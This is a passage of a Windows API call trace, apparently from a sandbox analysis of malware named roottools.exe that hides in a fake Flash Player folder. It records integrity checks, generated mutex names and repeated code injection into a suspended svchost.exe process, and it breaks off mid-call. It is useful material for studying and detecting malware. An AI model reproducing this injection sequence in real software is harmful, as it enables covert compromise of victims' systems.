[0312.874] CLSIDFromString (in: lpsz="{bb11c9c2-5dad-11e7-a275-806e6f6e6963}", pclsid=0x417a28 | out: pclsid=0x417a28*(Data1=0xbb11c9c2, Data2=0x5dad, Data3=0x11e7, Data4=([0]=0xa2, [1]=0x75, [2]=0x80, [3]=0x6e, [4]=0x6f, [5]=0x6e, [6]=0x69, [7]=0x63))) returned 0x0 [0312.874] GetVersionExW (in: lpVersionInformation=0x18f3d4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x77ce3472, dwMinorVersion=0x0, dwBuildNumber=0x32f048, dwPlatformId=0x0, szCSDVersion="ⴼ疝ⴼ疝") | out: lpVersionInformation=0x18f3d4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0312.874] GetVersionExW (in: lpVersionInformation=0x18f3c0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x18f478, dwMinorVersion=0x407dfd, dwBuildNumber=0x6, dwPlatformId=0x0, szCSDVersion="Ĝ") | out: lpVersionInformation=0x18f3c0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0312.874] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18f4ec | out: TokenHandle=0x18f4ec*=0x13c) returned 1 [0312.874] GetTokenInformation (in: TokenHandle=0x13c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18f4e8 | out: TokenInformation=0x0, ReturnLength=0x18f4e8) returned 0 [0312.874] GetLastError () returned 0x7a [0312.874] GetTokenInformation (in: TokenHandle=0x13c, TokenInformationClass=0x19, TokenInformation=0xb5ef9b0, TokenInformationLength=0x14, ReturnLength=0x18f4e8 | out: TokenInformation=0xb5ef9b0, ReturnLength=0x18f4e8) returned 1 [0312.874] GetSidSubAuthorityCount (pSid=0xb5ef9b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xb5ef9b9 [0312.874] GetSidSubAuthority (pSid=0xb5ef9b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xb5ef9c0 [0312.874] CloseHandle (hObject=0x13c) returned 1 [0312.874] CreateEventW (lpEventAttributes=0x4177e4, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x13c [0312.874] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18ff64 | out: TokenHandle=0x18ff64*=0x140) returned 1 [0312.874] GetTokenInformation (in: TokenHandle=0x140, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff4c | out: TokenInformation=0x0, ReturnLength=0x18ff4c) returned 0 [0312.874] GetLastError () returned 0x7a [0312.874] GetTokenInformation (in: TokenHandle=0x140, TokenInformationClass=0x1, TokenInformation=0xb5ef9b0, TokenInformationLength=0x24, ReturnLength=0x18ff4c | out: TokenInformation=0xb5ef9b0, ReturnLength=0x18ff4c) returned 1 [0312.874] GetTokenInformation (in: TokenHandle=0x140, TokenInformationClass=0xc, TokenInformation=0x4177e0, TokenInformationLength=0x4, ReturnLength=0x18ff60 | out: TokenInformation=0x4177e0, ReturnLength=0x18ff60) returned 1 [0312.874] CloseHandle (hObject=0x140) returned 1 [0312.874] GetLengthSid (pSid=0xb5ef9b8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0312.874] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x417810 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0312.875] PathRemoveBackslashW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned="g" [0312.875] GetCurrentProcess () returned 0xffffffff [0312.875] GetModuleFileNameExW (in: hProcess=0xffffffff, hModule=0x0, lpFilename=0x18fd64, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe")) returned 0x6e [0312.875] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77cb0000 [0312.875] GetProcAddress (hModule=0x77cb0000, lpProcName="RtlDosPathNameToNtPathName_U") returned 0x77d0ce41 [0312.875] GetProcAddress (hModule=0x77cb0000, lpProcName="NtCreateFile") returned 0x77cd00a4 [0312.875] GetProcAddress (hModule=0x77cb0000, lpProcName="NtClose") returned 0x77ccf9d0 [0312.876] GetProcAddress (hModule=0x77cb0000, lpProcName="NtQueryEaFile") returned 0x77cd1314 [0312.876] GetProcAddress (hModule=0x77cb0000, lpProcName="NtSetEaFile") returned 0x77cd19b0 [0312.876] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", NtPathName=0x18f880, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0312.876] NtCreateFile (in: FileHandle=0x18f874, DesiredAccess=0x8, ObjectAttributes=0x18f888*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x18f878, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x40, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x18f874*=0x14c, IoStatusBlock=0x18f878*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0312.876] NtQueryEaFile (in: FileHandle=0x14c, IoStatusBlock=0x18f878, Buffer=0xb5efb08, Length=0x409, ReturnSingleEntry=1, EaList=0x0, EaListLength=0x0, EaIndex=0x0, RestartScan=0 | out: IoStatusBlock=0x18f878, Buffer=0xb5efb08) returned 0x0 [0312.877] NtClose (Handle=0x14c) returned 0x0 [0312.877] StrCmpNIW (lpStr1="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpStr2="C:\\Users\\aETAdzjz\\AppData\\Roaming", nChar=33) returned 0 [0312.877] lstrcmpiW (lpString1="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", lpString2="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 0 [0312.879] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="C2") returned 2 [0312.879] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="E6") returned 2 [0312.879] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="EC") returned 2 [0312.879] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="E9") returned 2 [0312.879] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="93") returned 2 [0312.879] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="8A") returned 2 [0312.879] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="43") returned 2 [0312.879] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="20") returned 2 [0312.879] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="6F") returned 2 [0312.879] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="17") returned 2 [0312.879] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="2A") returned 2 [0312.879] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="85") returned 2 [0312.879] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="68") returned 2 [0312.879] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="4E") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="36") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="DB") returned 2 [0312.880] CreateMutexW (lpMutexAttributes=0x4177e4, bInitialOwner=1, lpName="C2E6ECE9938A43206F172A85684E36DB") returned 0x14c [0312.880] GetLastError () returned 0x0 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="9B") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="4D") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="68") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="96") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="17") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="31") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="FE") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="3C") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="22") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="DA") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="08") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="B6") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="40") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="79") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="9E") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="B6") returned 2 [0312.880] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="9B4D68961731FE3C22DA08B640799EB6") returned 0x0 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="7F") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="0E") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="6C") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="A1") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="75") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="D0") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="AD") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="DE") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="F9") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="23") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="FD") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="A0") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="09") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="EF") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="D2") returned 2 [0312.880] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="11") returned 2 [0312.880] OpenEventW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="7F0E6CA175D0ADDEF923FDA009EFD211") returned 0x0 [0312.880] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x18f698 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0312.881] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="E5") returned 2 [0312.881] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="8E") returned 2 [0312.881] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="FF") returned 2 [0312.881] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="54") returned 2 [0312.881] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="09") returned 2 [0312.881] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="68") returned 2 [0312.881] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="A4") returned 2 [0312.881] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="36") returned 2 [0312.881] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="E9") returned 2 [0312.881] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="82") returned 2 [0312.881] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="FC") returned 2 [0312.881] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="FA") returned 2 [0312.881] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="1C") returned 2 [0312.881] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="04") returned 2 [0312.881] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="45") returned 2 [0312.881] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="A2") returned 2 [0312.881] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="E58EFF540968A436E982FCFA1C0445A2") returned 0x0 [0312.881] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="E58EFF540968A436E982FCFA1C0445A2") returned 0x0 [0312.881] PathCombineW (in: pszDest=0x18f698, pszDir="C:\\Windows\\SysWOW64", pszFile="svchost.exe -k netsvcs" | out: pszDest="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs") returned="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" [0312.881] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f650*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f5f0 | out: lpCommandLine="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", lpProcessInformation=0x18f5f0*(hProcess=0x154, hThread=0x150, dwProcessId=0x320, dwThreadId=0x7c4)) returned 1 [0312.886] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="47") returned 2 [0312.886] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="86") returned 2 [0312.886] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="CF") returned 2 [0312.886] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="0F") returned 2 [0312.886] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="1E") returned 2 [0312.886] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="6E") returned 2 [0312.886] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="9E") returned 2 [0312.886] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="20") returned 2 [0312.886] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="64") returned 2 [0312.886] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="0C") returned 2 [0312.886] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="E4") returned 2 [0312.886] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="A2") returned 2 [0312.886] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="2D") returned 2 [0312.886] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="FF") returned 2 [0312.886] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="C9") returned 2 [0312.886] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="97") returned 2 [0312.886] CreateMutexW (lpMutexAttributes=0x4177e4, bInitialOwner=1, lpName="4786CF0F1E6E9E20640CE4A22DFFC997") returned 0x15c [0312.886] GetLastError () returned 0x0 [0312.886] VirtualAllocEx (hProcess=0x154, lpAddress=0x0, dwSize=0x1c000, flAllocationType=0x3000, flProtect=0x40) returned 0x70000 [0312.887] WriteProcessMemory (in: hProcess=0x154, lpBaseAddress=0x70000, lpBuffer=0xb570590*, nSize=0x1c000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0xb570590*, lpNumberOfBytesWritten=0x0) returned 1 [0312.888] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x15c, hTargetProcessHandle=0x154, lpTargetHandle=0x18f5bc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18f5bc*=0x4) returned 1 [0312.888] WriteProcessMemory (in: hProcess=0x154, lpBaseAddress=0x876c4, lpBuffer=0x18f5c4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5c4*, lpNumberOfBytesWritten=0x0) returned 1 [0312.888] WriteProcessMemory (in: hProcess=0x154, lpBaseAddress=0x877d0, lpBuffer=0x18f5b8*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5b8*, lpNumberOfBytesWritten=0x0) returned 1 [0312.888] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x13c, hTargetProcessHandle=0x154, lpTargetHandle=0x18f5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18f5a0*=0x8) returned 1 [0312.888] WriteProcessMemory (in: hProcess=0x154, lpBaseAddress=0x87d38, lpBuffer=0x18f5a0*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0312.889] CreateRemoteThread (in: hProcess=0x154, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x795bc, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x158 [0312.889] WaitForSingleObject (hHandle=0x158, dwMilliseconds=0x7d0) returned 0x0 [0312.963] CloseHandle (hObject=0x158) returned 1 [0312.963] CloseHandle (hObject=0x15c) returned 1 [0312.963] CloseHandle (hObject=0x150) returned 1 [0312.963] CloseHandle (hObject=0x154) returned 1 [0312.963] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x18f698 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0312.963] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="20") returned 2 [0312.963] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="BC") returned 2 [0312.963] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="29") returned 2 [0312.963] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="E1") returned 2 [0312.963] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="35") returned 2 [0312.963] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="FB") returned 2 [0312.963] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="9B") returned 2 [0312.963] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="01") returned 2 [0312.963] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="28") returned 2 [0312.963] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="51") returned 2 [0312.963] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="87") returned 2 [0312.963] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="E3") returned 2 [0312.963] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="B5") returned 2 [0312.963] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="59") returned 2 [0312.963] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="3C") returned 2 [0312.963] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="C8") returned 2 [0312.963] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="20BC29E135FB9B01285187E3B5593CC8") returned 0x0 [0312.963] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="20BC29E135FB9B01285187E3B5593CC8") returned 0x0 [0312.963] PathCombineW (in: pszDest=0x18f698, pszDir="C:\\Windows\\SysWOW64", pszFile="svchost.exe -k netsvcs" | out: pszDest="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs") returned="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" [0312.964] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f650*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f5f0 | out: lpCommandLine="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", lpProcessInformation=0x18f5f0*(hProcess=0x150, hThread=0x154, dwProcessId=0x7f8, dwThreadId=0x7e4)) returned 1 [0312.965] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="35") returned 2 [0312.965] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="D6") returned 2 [0312.965] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="5C") returned 2 [0312.965] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="8F") returned 2 [0312.965] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="BC") returned 2 [0312.965] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="A0") returned 2 [0312.965] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="69") returned 2 [0312.965] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="52") returned 2 [0312.965] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="70") returned 2 [0312.965] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="50") returned 2 [0312.965] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="02") returned 2 [0312.965] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="45") returned 2 [0312.965] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="0D") returned 2 [0312.965] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="67") returned 2 [0312.965] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="12") returned 2 [0312.965] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="FC") returned 2 [0312.966] CreateMutexW (lpMutexAttributes=0x4177e4, bInitialOwner=1, lpName="35D65C8FBCA06952705002450D6712FC") returned 0x158 [0312.966] GetLastError () returned 0x0 [0312.966] VirtualAllocEx (hProcess=0x150, 